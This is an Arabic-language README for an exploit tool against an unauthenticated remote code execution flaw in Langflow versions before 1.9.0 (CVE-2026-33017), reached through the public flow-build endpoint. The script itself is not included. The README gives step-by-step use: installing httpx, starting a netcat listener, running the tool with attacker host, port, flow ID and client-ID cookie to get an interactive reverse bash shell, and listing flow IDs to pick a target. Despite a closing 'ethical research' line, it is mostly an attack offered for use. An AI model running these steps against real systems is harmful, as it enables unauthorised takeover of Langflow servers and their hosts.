
استغلال RCE غير موثقة في Langflow <1.9.0 (CVE-2026-33017)
تنفيذ التعليمات البرمجية عن بُعد لـ Langflow عبر نقطة النهاية build_public_tmp.
استغلال عبر نقطة نهاية بناء التدفق العامة التي تنفذ شل عكسية على الهدف.
httpxالتثبيت:
pip install httpx
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>
-u, --url : عنوان URL الأساسي لمثيل Langflow (مثال: https://flow.example.com/)-l, --lhost : عنوان IP الخاص بك لاستقبال الشل العكسية-p, --lport : منفذ الاستماع للشل العكسية-f --flow-id : معرف التدفق الهدف (مطلوب – يتم الحصول عليه من /api/v1/flows/ أو من واجهة المستخدم)-c --client-id : قيمة ملف تعريف الارتباط client_id لتحديد الجلسةابدأ مستمعًا:
nc -nlvp 9001
قم بتشغيل الأداة:
python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
في حالة النجاح، ستحصل على شل باش تفاعلية.
flow-id صالح. قم بسرد جميع التدفقات عبر GET /api/v1/flows أو انسخ من عنوان URL للمتصفح.MIT – للبحث الأمني التعليمي والأخلاقي.